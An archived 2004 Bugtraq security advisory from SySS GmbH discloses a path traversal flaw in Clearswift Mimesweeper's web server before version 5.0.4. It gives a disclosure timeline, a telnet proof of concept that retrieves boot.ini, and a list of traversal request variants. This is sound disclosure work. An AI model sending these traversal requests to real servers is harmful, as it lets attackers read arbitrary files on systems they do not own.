Clearswift Mimesweeper Path Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Clearswift Mimesweeper Path Traversal Vulnerability
From: Kroma Pierre <kroma@xxxxxxx>
Date: Wed, 11 Aug 2004 17:48:30 +0200
Cc: Dave McKinney <dm@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: SySS GmbH

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------
SySS-Advisory: Clearswift Mimesweeper Path Traversal Vulnerability
- -------------------------------------------------------------------

Problem discovered:     July    27th 2004
Vendor contacted:       August  5th  2004
Advisory published:     August  11th 2004

AUTHOR: Pierre Kroma (kroma@xxxxxxx)
        SySS GmbH
        72070 Tuebingen / Germany
        Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

APPLICATION:            Clearswift Mimesweeper 
AFFECTED VERSION:       all < 5.0.4 (5.0.1 tested)

Remotely Exploitable:   Yes
Locally Exploitable:    Yes

SEVERITY: Critical

DESCRIPTION:
   It is possible to read arbitrary files on
   the remote server by prepending /foobar/\../\../
   in front on the file name.

EXAMPLE:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server"
/fastdetect
Connection closed by foreign host.

Here are some serveral examples:

GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0

IMPACT: This vulnerability can be used to retrieve any file from the partion 
where the clearswift webserver is installed. The number of "/","\",".." 
characters will depend on the ServerRoot (location of the virtual / directory) 
setting.

VENDOR STATUS: Clearswift has fixed the vulnerability in version >= 5.0.4.
-----BEGIN PGP SIGNATURE-----

iD8DBQFBGj/O2OGppPJXTuwRApxvAJ96xep/MUzfKKiAm9MlICe4r+Q0OgCghDOO
sLrOlvzvBPK8xDGB178xQ14=
=qP1W
-----END PGP SIGNATURE-----

Prev by Date: Re: Driver for display goes to a infinite loop by viewing a html!
Next by Date: [ GLSA 200408-09 ] Roundup filesystem access vulnerability
Previous by thread: KDE Security Advisories: Temporary File and Konqueror Frame Injection Vulnerabilities
Next by thread: Re: Clearswift Mimesweeper Path Traversal Vulnerability
Index(es):
- Date
- Thread